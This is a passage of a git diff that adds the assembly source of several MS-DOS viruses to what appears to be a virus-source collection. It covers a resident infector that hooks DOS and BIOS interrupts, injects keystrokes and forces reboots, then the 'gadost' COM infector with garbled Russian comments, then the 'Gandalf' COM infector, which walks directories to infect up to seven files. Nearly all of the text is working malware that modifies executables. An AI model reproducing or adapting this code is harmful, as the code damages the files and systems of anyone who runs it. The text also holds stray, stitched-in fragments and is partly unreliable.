CX,7FFFH ; Allow for 32K environment + XOR AL,AL ; Search for zero +BP0060: REPNZ SCASB ; Find zero + CMP ES:[DI],AL ; Is following character zero + LOOPNZ BP0060 ; Search again if not + MOV DX,DI ; Save pointer + ADD DX,3 ; Address pathname + MOV AX,4B00H ; Load and execute program + PUSH ES ; \ Set DS to ES + POP DS ; / + PUSH CS ; \ Set ES to CS + POP ES ; / + ASSUME DS:RAM,ES:NOTHING + MOV BX,OFFSET PPB_01 ; PPB (for load and execute) + PUSH DS + PUSH ES + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + + ; Install interrupt 9 routine + + MOV AX,3509H ; Get interrupt 9 + INT 21H ; DOS service (Get int) + MOV I09OFF,BX ; Save interrupt 9 offset + MOV I09SEG,ES ; Save interrupt 9 segment + MOV AX,2509H ; Set interrupt 9 + MOV DX,OFFSET BP0150 ; Interrupt 9 routine + INT 21H ; DOS service (Set int) + + MOV AH,2AH ; Get date + INT 21H ; DOS service (Get date) + CMP CX,07C5H ; Year = 1989 + JL BP0070 ; Branch if before + CMP DH,8 ; Month = August + JL BP0070 ; Branch if before + + ; Install interrupt 16H routine + + MOV OUT_SW,0 ; Set off output switch + MOV AX,3516H ; Get interrupt 16H + INT 21H ; DOS service (Get int) + MOV I16OFF,BX ; Save interrupt 16H offset + MOV I16SEG,ES ; Save interrupt 16H segment + MOV AX,2516H ; Set interrupt 16H + MOV DX,OFFSET BP0540 ; Interrupt 16H routine + INT 21H ; DOS service (Set int) + +BP0070: MOV BL,BB046C ; Get low byte of system clock + MOV BH,BL ; Copy + AND BX,0F00FH ; Isolate nibbles + CMP BL,0 ; Is low nibble of clock zero? + JNE BP0080 ; Branch if not + MOV CL,4 ; Bits to move + SHR BH,CL ; Move top nibble to bottom + CMP BH,0 ; Is second nibble of clock zero? + JE BP0080 ; Branch if yes + XOR AX,AX ; Clear register + MOV TCOUNT1,AX ; Set timer count (low) + MOV AL,BH ; Get second nibble of system clock + MOV TCOUNT2,AX ; Set timer count (high) + + ; Install interrupt 8 routine + + MOV AX,3508H ; Get interrupt 8 + INT 21H ; DOS service (Get int) + MOV I08OFF,BX ; Save interrupt 8 offset + MOV I08SEG,ES ; Save interrupt 8 segment + MOV AX,2508H ; Set interrupt 8 + MOV DX,OFFSET BP0100 ; Interrupt 8 routine + INT 21H ; DOS service (Set int) + +BP0080: POP DX + POP CX + POP BX + POP AX + POP ES + POP DS + ASSUME DS:NOTHING + PUSHF ; Fake an interrupt + CALL INT_21 ; Interrupt 21H (Load and execute) + PUSH DS ; \ Set ES to DS + POP ES ; / + MOV AH,49H ; Free allocated memory + INT 21H ; DOS service (Free memory) + MOV AH,4DH ; Get return code of child process + INT 21H ; DOS service (Get return code) + MOV AH,31H ; Keep process + MOV DX,OFFSET ENDADR ; Length of program + MOV CL,4 ; \ Convert to paragraphs + SHR DX,CL ; / + ADD DX,10H ; Add length of PSP + INT 21H ; DOS service (Keep process) + + ; Interrupt 24H + +BP0090: XOR AL,AL ; Ignore the error + IRET + + ; Interrupt 8 + +BP0100: SUB TCOUNT1,1 ; \ Subtract from timer count + SBB TCOUNT2,0 ; / + JNZ BP0140 ; Branch if not zero + CMP TCOUNT1,0 ; Is low count zero? + JNZ BP0140 ; Branch if not +BP0110: PUSH CS ; \ Set DS to CS + POP DS ; / + MOV AX,3 ; Mode three + INT 10H ; VDU I/O + MOV AH,2 ; Move cursor + MOV BH,0 ; Page zero + MOV DX,0A14H ; Row ten column twenty + INT 10H ; VDU I/O + MOV SI,OFFSET STRNG8 ; Address message +BP0120: LOOP BP0120 ; Delay between characters + LODSB ; Get a character + CMP AL,0 ; Is that the end? + JE BP0130 ; Branch if yes + XOR AL,0AFH ; Decrypt character + MOV AH,14 ; Write in TTY mode + INT 10H ; VDU I/O + JMP BP0120 ; Next character + +BP0130: DB 0EAH ; Far jump to BIOS initialisation + DW 0FFF0H, 0F000H + +BP0140: JMP INT_08 ; Interrupt 8 + + ; Interrupt 9 + + ASSUME DS:RAM +BP0150: PUSH AX + PUSH BX + PUSH DS + XOR AX,AX ; \ Address zero + MOV DS,AX ; / + IN AL,60H ; Get keyboard token + MOV BL,BB0417 ; Get key states + TEST BL,8 ; Alt key depressed? + JZ BP0160 ; Branch if not + TEST BL,4 ; Ctrl key depressed? + JZ BP0160 ; Branch if not + CMP AL,53H ; Del character token? + JNE BP0160 ; Branch if not + AND BL,0F3H ; Set off Alt & Ctrl states + MOV BB0417,BL ; Replace key states + IN AL,61H ; Get Port B + MOV AH,AL ; Save value + OR AL,80H ; Set on keyboard reset bit + OUT 61H,AL ; Output port B + XCHG AL,AH ; Recover original Port B value + OUT 61H,AL ; Output port B + JMP BP0110 ; Message and reboot + +BP0160: POP DS + POP BX + POP AX + JMP INT_09 ; Interrupt 9 + + ; Interrupt 21H + +BP0170: PUSHF + CMP AH,0E1H ; Virus "are you there" call + JNE BP0180 ; Branch if other call + MOV AX,0400H ; Standard "yes" + POPF + IRET + +BP0180: CMP AH,0DDH ; Virus move and execute COM call + JE BP0200 ; Branch if yes + CMP AX,4B00H ; Is it load and execute + JNE BP0190 ; Branch if not + JMP BP0210 ; Process load and execute + +BP0190: POPF + JMP INT_21 ; Interrupt 21H + + ; Move program down and execute (COM only) call + + ASSUME DS:NOTHING +BP0200: POP AX + POP AX ; Retrieve return offset + MOV AX,100H ; Replace with start address + MOV V_RTOF,AX ; Store in return jump + POP AX ; Retrieve return segment + MOV V_RTSG,AX ; Store in return jump + REPZ MOVSB ; Restore program to beginning + POPF + MOV AX,BEGIN ; Start with zero register + JMP VIR_RT ; Start actual program + + ; Process load and execute program + +BP0210: MOV F_HAND,-1 ; No file handle + MOV MEM_SW,0 ; Set off memory allocated switch + MOV FPTHOF,DX ; Save pathname offset + MOV FPTHSG,DS ; Save pathname segment + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH DS + PUSH ES + CLD + MOV DI,DX ; Point to file pathname + XOR DL,DL ; Default drive + CMP BYTE PTR [DI+1],3AH ; Test second character for ':' + JNE BP0220 ; Branch if not + MOV DL,[DI] ; Get drive letter + AND DL,1FH ; Convert to number +BP0220: MOV AH,36H ; Get disk free space + INT 21H ; DOS service (Get disk free) + CMP AX,-1 ; Test for invalid drive + JNE BP0240 ; Branch if not +BP0230: JMP BP0530 ; Terminate + +BP0240: MUL BX ; Calc number of free sectors + MUL CX ; Calc number of free bytes + OR DX,DX ; Test high word of result + JNZ BP0250 ; Branch if not zero + CMP AX,OFFSET ENDADR ; Length of virus + JB BP0230 ; Terminate if less +BP0250: MOV DX,FPTHOF ; Get pathname offset + PUSH DS ; \ Set ES to DS + POP ES ; / + XOR AL,AL ; Test character - zero + MOV CX,41H ; Maximum pathname length + REPNZ SCASB ; Find end of pathname + MOV SI,FPTHOF ; Get pathname offset +BP0260: MOV AL,[SI] ; Get pathname character + OR AL,AL ; Test for a character + JZ BP0280 ; Finish if none + CMP AL,61H ; Test for 'a' + JB BP0270 ; Branch if less + CMP AL,7AH ; Test for 'z' + JA BP0270 ; Branch if above + SUB BYTE PTR [SI],20H ; Convert to uppercase +BP0270: INC SI ; Address next character + JMP BP0260 ; Process next character + +BP0280: MOV CX,0BH ; Load length 11 + SUB SI,CX ; Address back by length + MOV DI,OFFSET COM_CM ; 'COMMAND.COM' + PUSH CS ; \ Set ES to CS + POP ES ; / + MOV CX,0BH ; Load length again + REPZ CMPSB ; Compare + JNE BP0290 ; Continue if not command.com + JMP BP0530 ; Terminate + +BP0290: MOV AX,4300H ; Get file attributes + INT 21H ; DOS service (Get attributes) + JB BP0300 ; Follow chain of error branches + MOV F_ATTS,CX ; Save file attributes +BP0300: JB BP0320 ; Follow chain of error branches + XOR AL,AL ; Scan character - zero + MOV EXE_SW,AL ; Set EXE switch off + PUSH DS ; \ Set ES to DS + POP ES ; / + MOV DI,DX ; Pointer to pathname + MOV CX,41H ; Maximum pathname length + REPNZ SCASB ; Find end of pathname + CMP BYTE PTR [DI-2],4DH ; Is last letter 'M' + JE BP0310 ; Branch if yes + CMP BYTE PTR [DI-2],6DH ; Is last letter 'm' + JE BP0310 ; Branch if yes + INC EXE_SW ; Set EXE switch on +BP0310: MOV AX,3D00H ; Open handle, read only + INT 21H ; DOS service (Open handle) +BP0320: JB BP0330 ; Follow chain of error branches + MOV F_HAND,AX ; Save file handle + MOV BX,AX ; File handle + CMP EXE_SW,0 ; Test EXE switch + JE BP0340 ; Branch if off + + ; Test EXE file for infection + + MOV CX,1CH ; Length of EXE header + MOV DX,OFFSET EXEHED ; .EXE header store + MOV AX,CS ; \ + MOV DS,AX ; ) Make DS & ES same as CS + MOV ES,AX ; / + ASSUME DS:CODE + MOV AH,3FH ; Read handle + INT 21H ; DOS service (Read handle) +BP0330: JB BP0370 ; Follow chain of error branches + CMP EXHD09,1988H ; Negative checksum + JNE BP0360 ; Branch if not infected + JMP BP0350 ; Dont infect + + ASSUME DS:NOTHING +BP0340: MOV AX,4202H ; Move file pointer + MOV CX,-1 ; \ End of file minus 6 + MOV DX,-6 ; / + INT 21H ; DOS service (Move pointer) + JB BP0320 ; Follow chain of error branches + ADD AX,6 ; Total file size + MOV F_SIZE,AX ; Save total file size + MOV CX,6 ; Length to read + MOV DX,OFFSET SIGBUF ; Infection test buffer + MOV AX,CS ; \ + MOV DS,AX ; ) Make DS & ES same as CS + MOV ES,AX ; / + ASSUME DS:CODE + MOV AH,3FH ; Read handle + INT 21H ; DOS service (Read handle) + MOV DI,DX ; Address test buffer + MOV SI,OFFSET VR_SIG ; Signature + REPZ CMPSB ; Compare signatures + JNE BP0360 ; Branch if not infected +BP0350: MOV AH,3EH ; Close handle + INT 21H ; DOS service (Close handle) + JMP BP0530 ; Terminate + +BP0360: MOV AX,3524H ; Get interrupt 24H + INT 21H ; DOS service (Get int) + MOV I24OFF,BX ; Save interrupt 24H offset + MOV I24SEG,ES ; Save interrupt 24H segment + MOV DX,OFFSET BP0090 ; Interrupt 24H routine + MOV AX,2524H ; Set interrupt 24H + INT 21H ; DOS service (Set int) + LDS DX,F_PATH ; Address program pathname + XOR CX,CX ; No attributes + MOV AX,4301H ; Set file attributes + INT 21H ; DOS service (Set attributes) + ASSUME DS:NOTHING +BP0370: JB BP0380 ; Follow chain of error branches + MOV BX,F_HAND ; Get file handle + MOV AH,3EH ; Close handle + INT 21H ; DOS service (Close handle) + MOV F_HAND,-1 ; No file handle + MOV AX,3D02H ; Open handle read/write + INT 21H ; DOS service (Open handle) + JB BP0380 ; Follow chain of error branches + MOV F_HAND,AX ; Save file handle + MOV AX,CS ; \ + MOV DS,AX ; ) Make DS & ES same as CS + MOV ES,AX ; / + ASSUME DS:CODE + MOV BX,F_HAND ; Get file handle + MOV AX,5700H ; Get file date and time + INT 21H ; DOS service (Get file date) + MOV F_DATE,DX ; Save file date + MOV F_TIME,CX ; Save file time + MOV AX,4200H ; Move file pointer + XOR CX,CX ; \ Beginning of file + MOV DX,CX ; / + INT 21H ; DOS service (Move pointer) +BP0380: JB BP0410 ; Follow chain of error branches + CMP EXE_SW,0 ; Test EXE switch + JE BP0390 ; Branch if off + JMP BP0430 ; Process EXE file + + ; .COM file processing + +BP0390: MOV BX,1000H ; 64K of memory wanted + MOV AH,48H ; Allocate memory + INT 21H ; DOS service (Allocate memory) + JNB BP0400 ; Branch if successful + MOV AH,3EH ; Close handle + MOV BX,F_HAND ; Get file handle + INT 21H ; DOS service (Close handle) + JMP BP0530 ; Terminate + +BP0400: INC MEM_SW ; Set on memory allocated switch + MOV ES,AX ; Segment of allocated memory + XOR SI,SI ; Start of virus + MOV DI,SI ; Start of allocated memory + MOV CX,OFFSET ENDADR ; Length of virus + REPZ MOVSB ; Copy virus to allocated + MOV DX,DI ; Address after virus + MOV CX,F_SIZE ; Total file size + MOV BX,F_HAND ; Get file handle + PUSH ES ; \ Set DS to ES + POP DS ; / + MOV AH,3FH ; Read handle + INT 21H ; DOS service (Read handle) +BP0410: JB BP0420 ; Follow chain of error branches + ADD DI,CX ; Add previous file size + XOR CX,CX ; \ Beginning of file + MOV DX,CX ; / + MOV AX,4200H ; Move file pointer + INT 21H ; DOS service (Move pointer) + MOV SI,OFFSET VR_SIG ; Signature + MOV CX,6 ; Length to move + REPZ MOVS [DI],CS:VR_SIG ; Copy signature to end + MOV CX,DI ; Length to write + XOR DX,DX ; Start of allocated + MOV AH,40H ; Write handle + INT 21H ; DOS service (Write handle) +BP0420: JB BP0440 ; Follow chain of error branches + JMP BP0510 ; Free memory and reset values + + ; .EXE file processing + +BP0430: MOV CX,1CH ; Length of EXE header + MOV DX,OFFSET EXEHED ; .EXE header store + MOV AH,3FH ; Read handle + INT 21H ; DOS service (Read handle) +BP0440: JB BP0460 ; Follow chain of error branches + MOV EXHD09,1988H ; Negative checksum + MOV AX,EXHD07 ; \ Store initial stack segment + MOV PRG_SS,AX ; / + MOV AX,EXHD08 ; \ Store initial stack pointer + MOV PRG_SP,AX ; / + MOV AX,EXHD10 ; \ Store initial code offset + MOV PRGOFF,AX ; / + MOV AX,EXHD11 ; \ Store initial code segment + MOV PRGSEG,AX ; / + MOV AX,EXHD02 ; Get size of file in pages + CMP EXHD01,0 ; Number of bytes in last page + JE BP0450 ; Branch if none + DEC AX ; One less page +BP0450: MUL BYTSEC ; Bytes per sector + ADD AX,EXHD01 ; \ Add bytes in last page + ADC DX,0 ; / + ADD AX,0FH ; \ Round up + ADC DX,0 ; / + AND AX,0FFF0H ; Clear bottom figure + MOV F_SIZ1,AX ; Save low-order file size + MOV F_SIZ2,DX ; Save high-order file size + ADD AX,OFFSET ENDADR ; \ Add virus length + ADC DX,0 ; / +BP0460: JB BP0480 ; Follow chain of error branches + DIV BYTSEC ; Bytes per sector + OR DX,DX ; Test odd bytes + JZ BP0470 ; Branch if none + INC AX ; One more page for odd bytes +BP0470: MOV EXHD02,AX ; Store size of file in pages + MOV EXHD01,DX ; Store bytes in last page + MOV AX,F_SIZ1 ; Low-order file size + MOV DX,F_SIZ2 ; High-order file size + DIV PARAGR ; Size of a paragraph + SUB AX,EXHD04 ; Size of header in paragraphs + MOV EXHD11,AX ; Initial code segment + MOV EXHD10,OFFSET BP0030 ; Initial code offset + MOV EXHD07,AX ; Initial stack segment + MOV EXHD08,OFFSET ENDADR ; Initial stack pointer + XOR CX,CX ; \ Beginning of file + MOV DX,CX ; / + MOV AX,4200H ; Move file pointer + INT 21H ; DOS service (Move pointer) +BP0480: JB BP0490 ; Follow chain of error branches + MOV CX,1CH ; Length of EXE header + MOV DX,OFFSET EXEHED ; .EXE header store + MOV AH,40H ; Write handle + INT 21H ; DOS service (Write handle) +BP0490: JB BP0500 ; Follow chain of error branches + CMP AX,CX ; Has same length been written + JNE BP0510 ; Branch if not + MOV DX,F_SIZ1 ; Low-order file size + MOV CX,F_SIZ2 ; High-order file size + MOV AX,4200H ; Move file pointer + INT 21H ; DOS service (Move pointer) +BP0500: JB BP0510 ; Follow chain of error branches + XOR DX,DX ; Address beginning of virus + MOV CX,OFFSET ENDADR ; Length of virus + MOV AH,40H ; Write handle + INT 21H ; DOS service (Write handle) + ASSUME DS:NOTHING +BP0510: CMP MEM_SW,0 ; Test memory allocated switch + JE BP0520 ; Branch if off + MOV AH,49H ; Free allocated memory + INT 21H ; DOS service (Free memory) +BP0520: CMP F_HAND,-1 ; Test file handle + JE BP0530 ; Terminate if none + MOV BX,F_HAND ; Get file handle + MOV DX,F_DATE ; Get file date + MOV CX,F_TIME ; Get file time + MOV AX,5701H ; Set file date and time + INT 21H ; DOS service (Set file date) + MOV AH,3EH ; Close handle + INT 21H ; DOS service (Close handle) + LDS DX,F_PATH ; Address program pathname + MOV CX,F_ATTS ; Load file attributes + MOV AX,4301H ; Set file attributes + INT 21H ; DOS service (Set attributes) + LDS DX,INT_24 ; Original interrupt 24H address + MOV AX,2524H ; Set interrupt 24H + INT 21H ; DOS service (Set int) +BP0530: POP ES + POP DS + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + POPF + JMP INT_21 ; Interrupt 21H + + ; Interrupt 16H routine + +BP0540: PUSHF ; Fake an interrupt + CMP AH,0 ; Get a token function? + JE BP0550 ; Branch if yes + POPF ; Fake interrupt not needed + JMP INT_16 ; Pass on to original interrupt + +BP0550: CALL INT_16 ; Deal with original interrupt + PUSH AX + PUSH BX + PUSH DI + PUSH DS + PUSH ES + PUSH CS ; \ Set DS to CS + POP DS ; / + XOR BX,BX ; \ Set ES to zero + MOV ES,BX ; / + ASSUME DS:CODE,ES:RAM + CMP OUT_SW,0 ; Is output switch on? + JNE BP0630 ; Branch if yes + OR AL,20H ; Convert to lower case + XOR AL,0AFH ; Decrypt character + MOV DI,OFFSET TABLE ; Address first entry +BP0560: CMP BYTE PTR [DI],0 ; Is this the end of the table? + JE BP0590 ; Branch if yes + XOR BX,BX ; Clear register + MOV BL,[DI+1] ; Get current character pointer + ADD BX,[DI+2] ; Add current entry pointer + CMP AL,[BX] ; Is character the one we want? + JE BP0570 ; Branch if yes + MOV BYTE PTR [DI+1],0 ; Clear character pointer + JMP BP0580 + +BP0570: INC BYTE PTR [DI+1] +BP0580: ADD DI,4 ; Next entry + JMP BP0560 ; Process next entry + +BP0590: MOV DI,OFFSET TABLE ; Address first entry +BP0600: CMP BYTE PTR [DI],0 ; Is this the end of the table? + JE BP0610 ; Branch if yes + MOV AL,[DI+1] ; Get current character pointer + CMP AL,[DI] ; Do we have a complete match? + JNE BP0620 ; Branch if not + MOV TABOUT,DI ; Save relevant pointer + INC OUT_SW ; Set on output switch + MOV AX,40H ; \ Address RAM + MOV ES,AX ; / + ASSUME ES:RAM40 + MOV AX,BW041A ; Get key token in pointer + MOV BW041C,AX ; Set key token out pointer + CALL BP0640 ; Put a character into the buffer +BP0610: POP ES + POP DS + POP DI + POP BX + POP AX + IRET + +BP0620: ADD DI,4 ; Next entry + JMP BP0600 ; Process next entry + +BP0630: MOV AX,40H ; \ Address RAM + MOV ES,AX ; / + CALL BP0640 ; Put a character into the buffer + XOR BX,BX ; Clear register + MOV BL,[DI+1] ; Get current character pointer + ADD BX,[DI+2] ; Add entry pointer + CMP BYTE PTR [BX],0 ; Was that the last character? + JNE BP0610 ; Branch if not + MOV OUT_SW,0 ; Set off output switch + JMP BP0610 + +BP0640: MOV DI,TABOUT ; Address relevant table entry + XOR BX,BX ; Clear register + MOV BL,[DI+1] ; Get current character pointer + ADD BX,[DI+2] ; Add entry pointer + MOV AL,[BX] ; Get the character + XOR AL,0AFH ; Decrypt character + INC BYTE PTR [DI+1] ; Next character + MOV AH,AL ; Copy for translate + MOV BX,OFFSET KEYTAB ; Address key number table + XLAT ; Get key number + XCHG AH,AL ; Reserve order + MOV BX,BW041C ; Get key token out pointer + MOV ES:[BX],AX ; Put key token into buffer + INC BX ; \ Next buffer position + INC BX ; / + CMP BX,BW0482 ; Passed end of buffer? + JNE BP0650 ; Branch if not + MOV BX,BW0480 ; Get buffer start +BP0650: MOV BW041C,BX ; Save new key token out pointer + RET + + ; Stack area - This is also necessary to make the virus a complete + ; number of paragraphs + + DB 04CH, 002H, 0AAH, 031H, 09EH, 002H, 0A5H, 031H + +ENDADR EQU $ + +CODE ENDS + + END START +ete + ; number of paragraphs + + DB 04CH, +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.gadost.asm b/MSDOS/Virus.MSDOS.Unknown.gadost.asm new file mode 100644 index 00000000..15b3a40a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gadost.asm @@ -0,0 +1,228 @@ +; +; ⪮஢, ⮫쪮 ⮬ ᬠਢ +; source code. ( ࠢ ࠧ ਤ :-)). +; +; 쪠 (쪠) , ৮, , ᪮⨭... +; +; 饬, , ࠦ 直 ⠬ 䠩 ⪥ +; - 䠬 .COM, - ठ ஬ +; 21- ࠯, 뢠 ᢮ ⥫ ୮ , ࠦ +; 䠩 ਪ (⠪ ⨯ 窨, ᯮ +; த ᥪ -祣 +; ᢮), ᯮ 4- 砫, ᢮ 稥 +; ஢ ⠪: AX ᫮ BABA ( ᫥, ⠪ +; ᫮, word 0BABAh), 믮 21- ࠯⮢ ᬮ, +; 0FACCh. ᫨ , 窮 ⭮. +; +; Copyright (c) 1992, Gogi&Givi International +; + +.model tiny +.code + org 0100h +VirPar equ (endvir-StartVirus)/16+2 ; ࠣ䮢 +VirLen equ (endvir-StartVirus) ; + ; 㣮 +gadost: + db '' ; CALL + dw StartVirus-$-2 ; ᬥ饭 StartVirus + db 15,09h ; ਪ ⮪ mov ah, + int 21h ; ଠ + ret ; +GoodMessage db ' ᪨! !',13,10,'$' + ; ᠤ 廊 + ; ᪮ +StartVirus: + pop si ; ⮡ 㧭, 㤠 + call EntryPoint ; ᫮ +EntryPoint: + pop si ; 믨孥 砫 ࠧ + push ds ; ࠭ -ன ॣ஢... + push es + push si + mov ax,cs ; ⠭ ᯥ + mov es,ax ; 䠩 + mov ds,ax + mov di,0100h + add si,RobbedBytes-EntryPoint + mov cx,4 + cld ; ⠭ + rep movsb + pop si + mov ax,0BABAh ; ஢ਬ, - + int 21h ; ᫥, + cmp ax,0FACCh ; + jne NeedsBaba ; , , த! + jmp FucksNow ; 㦥 ࠡ뢠 +NeedsBaba: + pop es + push es + mov ax,es ; 뢠 ᥡ  PSP + dec ax + mov es,ax ; ⮫쪮 襩 + mov ax,es:[3] ; ࠣ䮢 + sub ax,virpar + mov es:[3],ax + mov bx,es:[1] ; PSP + add bx,ax ; ᢠ + mov es,bx + push ds ; , ⭮ + xor ax,ax + mov ds,ax + mov ax,ds:[21h*4] ; 墠뢠 + mov cs:[si+Off21-EntryPoint],ax ; int 21h + mov ax,ds:[21h*4+2] ; ᫥, , + mov cs:[si+Seg21-EntryPoint],ax ; + pop ds + xor di,di ; ᮢ뢠 砫 + push si ; 祩 ᥣ + sub si,EntryPoint-StartVirus ; - ઠ + mov cx,VirLen ; ᭮ + rep movsb ; ⥫ + pop si + push ds ; ⠢ 㪠 + xor ax,ax ; ᭮ ⥫ + mov ds,ax ; 뢠 21h + mov word ptr ds:[21h*4],Int21Server-StartVirus + mov ds:[21h*4+2],es + pop ds + +FucksNow: + pop es ; 砥, ᫨ + pop ds ; । 騭 + mov si,0100h ; (ᮬ) 㦥 + push si + xor ax,ax ; ⠭ + xor bx,bx ; ७ - , + xor di,di ; + ret + +Int21Server: + pushf ; ࠡ稪 + push ax ; 21- + push bx + push ds + cmp ax,0BABAh ; ⠭ ॠ + jne NotTest ; । 騭 + pop ds ; ( ४) + pop bx + pop ax + popf + mov ax,0FACCh ; ଠ쭠 ४ + iret ; ( ॠ) + +NotTest: + push cx ; ᭮ ⨬, + mov cx,ax ; ⮡ ᤥ , + xchg cl,ch ; ᮢᥬ 㦭 + xor cl,4Bh ; ࠡ뢠 㭪 EXEC + pop cx ; (⮡ ᪨ + jz Exec ; ⮡ 窨 ⥫) + jmp NotExec + +Exec: + mov bx,dx ; ᬥ饭 + ; ᪠ 䠩 BX +SearchZero: + cmp byte ptr ds:[bx],0 ; ஢ਬ + je ZeroFound ; , ! + inc bx + jmp SearchZero + +ZeroFound: + sub bx,11 ; 㤥᭮! + push es ; ஢ਬ, - + mov ax,cs ; + mov es,ax ; ࠧ COMMAND.COM + mov cx,11 + mov di,offset CommandName-StartVirus + +Compare: + mov al,ds:[bx] ; ᫮ 㤭 + cmp al,es:[di] ; 楤 ஢ન... + jne NotCommand + inc bx + inc di + dec cx ; ஢塞, ஢塞... + cmp cx,0 + jne Compare + pop es + jmp Quit21Server ; - COMMAND.COM + ; ࠦ?! +NotCommand: + pop es ; ࠭﫨 祣- + push ax + push bx ; ࠭ , + push cx ; , ⮡ ய + push dx + mov ax,3D02h ; 㯮ਢ (䠩) + int 21h + jc EndExec ; 뢠 ஡ + mov bx,ax ; ஡ 䠩 BX + mov cx,4 ; ⥫ 4 + mov ax,cs + mov ds,ax + mov ah,3Fh ; , + mov dx,offset RobbedBytes-StartVirus + int 21h ; ᯥ + jc EndExec + cmp word ptr cs:[RobbedBytes-StartVirus],'ZM' + je CloseFile ; 䨣 EXE ࠦ??? + xor cx,cx + xor dx,dx + mov ax,4202h + int 21h ; 䠩 + cmp ax,1000 ; 䨣 䠩 + jl CloseFile ; 1 ? + cmp ax,64000 ; ⥬ 64 + ja CloseFile + sub ax,3 + mov cs:[FileSize-StartVirus],ax ; ਪ ? + cmp byte ptr cs:[RobbedBytes-StartVirus+3],15 + je CloseFile ; ! + mov ax,cs + mov ds,ax + mov ah,40h ; ஡ + xor dx,dx ; ⥫ ୮ 䠩 + mov cx,VirLen + int 21h + xor cx,cx ; 砫 㡥, ⮡ + xor dx,dx ; JUMP 㤠 ⠢ + mov ax,4200h + int 21h + mov ah,40h + mov dx,offset SuperByte-StartVirus ; 䠩, ⮡ + mov cx,4 ; 뢠 + int 21h ; ᧠ +CloseFile: + mov ah,3Eh ; ⨥ 䠩 - + int 21h ; 㦥 +EndExec: + pop dx ; ⠬, , ࠭﫨 + pop cx ; 祣-? + pop bx + pop ax + jmp Quit21Server ; ! + +NotExec: + ; 砩 ᫥ 堬᪨ ࠧࠡ⮪ + +Quit21Server: + pop ds ; ⮫쪮 + pop bx ; STACK' 﫨?! + pop ax + popf ; 䫠?!!! + db 0EAh +Off21 dw 0000h ; 㤥 , ... +Seg21 dw 0000h + +RobbedBytes: + mov dx,offset GoodMessage ; த ᯥ + db 0B4h +SuperByte db '' ; ᯥ, +FileSize dw 0000h ; ⮦ 訥 + db 15 ; ਪ + db '=>' ; +CommandName db 'COMMAND.COM<=' ; COMMAND.COM +endvir: +end gadost ; ! \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.gandalf.asm b/MSDOS/Virus.MSDOS.Unknown.gandalf.asm new file mode 100644 index 00000000..46721876 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gandalf.asm @@ -0,0 +1,202 @@ +; Virus generated by G 0.70 +; G written by Dark Angel of Phalcon/Skism + +; File: GANDALF.ASM +; Gandalf by Ender + + + .model tiny + .code + +; Assemble with: +; TASM /m3 filename.ASM +; TLINK /t filename.OBJ + org 0100h + +carrier: + db 0E9h,0,0 ; jmp start + +start: + call next +next: + pop bp + sub bp, offset next + + mov ah, 0047h ; Get directory + lea si, [bp+offset origdir+1] + cwd ; Default drive + int 0021h + + lea dx, [bp+offset newDTA] + mov ah, 001Ah ; Set DTA + int 0021h + + mov ax, 3524h + int 0021h + push es + push bx + + lea dx, [bp+INT24] ; ASSumes ds=cs + mov ax, 2524h + int 0021h + + push cs + pop es + +restore_COM: + mov di, 0100h + push di + lea si, [bp+offset old3] + movsb + movsw + + mov byte ptr [bp+numinfect], 0000h +traverse_loop: + lea dx, [bp+offset COMmask] + call infect + cmp [bp+numinfect], 0007h + jae exit_traverse ; exit if enough infected + + mov ah, 003Bh ; CHDIR + lea dx, [bp+offset dot_dot] ; go to previous dir + int 0021h + jnc traverse_loop ; loop if no error + +exit_traverse: + + lea si, [bp+offset origdir] + mov byte ptr [si], '\' + mov ah, 003Bh ; restore directory + xchg dx, si + int 0021h + + pop dx + pop ds + mov ax, 2524h + int 0021h + + + mov dx, 0080h ; in the PSP + mov ah, 001Ah ; restore DTA to default + int 0021h + +return: + ret + +old3 db 0cdh,20h,0 + +INT24: + mov al, 0003h + iret + +infect: + mov cx, 0007h ; all files + mov ah, 004Eh ; find first +findfirstnext: + int 0021h + jc return + mov ax, 4300h + lea dx, [bp+newDTA+30] + int 0021h + jc return + push cx + push dx + + mov ax, 4301h ; clear file attributes + push ax ; save for later use + xor cx, cx + int 0021h + + mov ax, 3D02h + lea dx, [bp+newDTA+30] + int 0021h + mov bx, ax ; xchg ax,bx is more efficient + + mov ax, 5700h ; get file time/date + int 0021h + push cx + push dx + + mov ah, 003Fh + mov cx, 001Ah + lea dx, [bp+offset readbuffer] + int 0021h + + mov ax, 4202h + xor cx, cx + cwd + int 0021h + + cmp word ptr [bp+offset readbuffer], 'ZM' + jz jmp_close + mov cx, word ptr [bp+offset readbuffer+1] ; jmp location + add cx, heap-start+3 ; convert to filesize + cmp ax, cx ; equal if already infected + jl skipp +jmp_close: + jmp close +skipp: + + cmp ax, 65535-(endheap-start) ; check if too large + ja jmp_close ; Exit if so + + cmp ax, (heap-start) ; check if too small + jb jmp_close ; Exit if so + + lea si, [bp+offset readbuffer] + lea di, [bp+offset old3] + movsb + movsw + + sub ax, 0003h + mov word ptr [bp+offset readbuffer+1], ax + mov dl, 00E9h + mov byte ptr [bp+offset readbuffer], dl + lea dx, [bp+offset start] + mov ah, 0040h ; concatenate virus + mov cx, heap-start + int 0021h + + xor cx, cx + mov ax, 4200h + xor dx, dx + int 0021h + + + mov cx, 0003h + lea dx, [bp+offset readbuffer] + mov ah, 0040h + int 0021h + + inc [bp+numinfect] + +close: + mov ax, 5701h ; restore file time/date + pop dx + pop cx + int 0021h + + mov ah, 003Eh + int 0021h + + pop ax ; restore file attributes + pop dx ; get filename and + pop cx ; attributes from stack + int 0021h + + mov ah, 004Fh ; find next + jmp findfirstnext + +signature db '[PS/G]',0 ; Phalcon/Skism G +creator db 'Ender',0 +virusname db 'Gandalf',0 +COMmask db '*.COM',0 +dot_dot db '..',0 + +heap: +newDTA db 43 dup (?) +origdir db 65 dup (?) +numinfect db ? +readbuffer db 1ah dup (?) +endheap: + end carrier diff --git a/MSDOS/Virus.MSDOS.Unknown.gc1575a.asm b/MSDOS/Virus.MSDOS.Unknown.gc1575a.asm new file mode 100644 index 00000000..2b61bab3 --- /dev/null +++ 